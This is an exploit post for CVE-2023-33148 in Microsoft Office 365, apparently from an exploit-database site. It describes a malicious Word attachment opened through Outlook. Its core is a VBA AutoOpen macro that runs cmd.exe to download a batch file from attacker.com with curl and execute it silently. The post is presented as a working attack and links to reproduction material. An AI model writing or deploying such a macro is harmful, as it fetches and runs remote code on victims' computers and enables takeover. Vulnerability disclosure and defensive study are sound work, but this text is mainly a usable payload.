Microsoft Office 365 18.2305.1222.0 Remote Code Execution

## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation ofPrivilege Vulnerability + RCE.## Author: nu11secur1ty## Date: 07.18.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office## Reference: https://portswigger.net/web-security/access-control## CVE-2023-33148## Description:The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable toElevation of Privilege.The attacker can use this vulnerability to attach a very maliciousWORD file in the Outlook app which is a part of Microsoft Office 365and easily can trick the victim to click on it - opening it andexecuting a very dangerous shell command, in the background of thelocal PC. This execution is without downloading this malicious file,and this is a potential problem and a very dangerous case! This can bethe end of the victim's PC, it depends on the scenario.WARNING! Office 365 executes files directly from Outlook, without tempdownloading, security checking and etc.## Staus: HIGH Vulnerability[+]Exploit:- - - NOTE:This exploit is connected to the third-party server, and when thevictim clicks on it and opens it the content of the script which isinside will fetch on the machine locally and execute himself by usingMS Office 365 and Outlook app which is a part of the 365 API.```vbSub AutoOpen()  Call Shell("cmd.exe /S /c" & "curl -shttps://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat&& .\salaries.bat", vbNormalFocus)End Sub```## Reproduce:[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)## Time spend:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>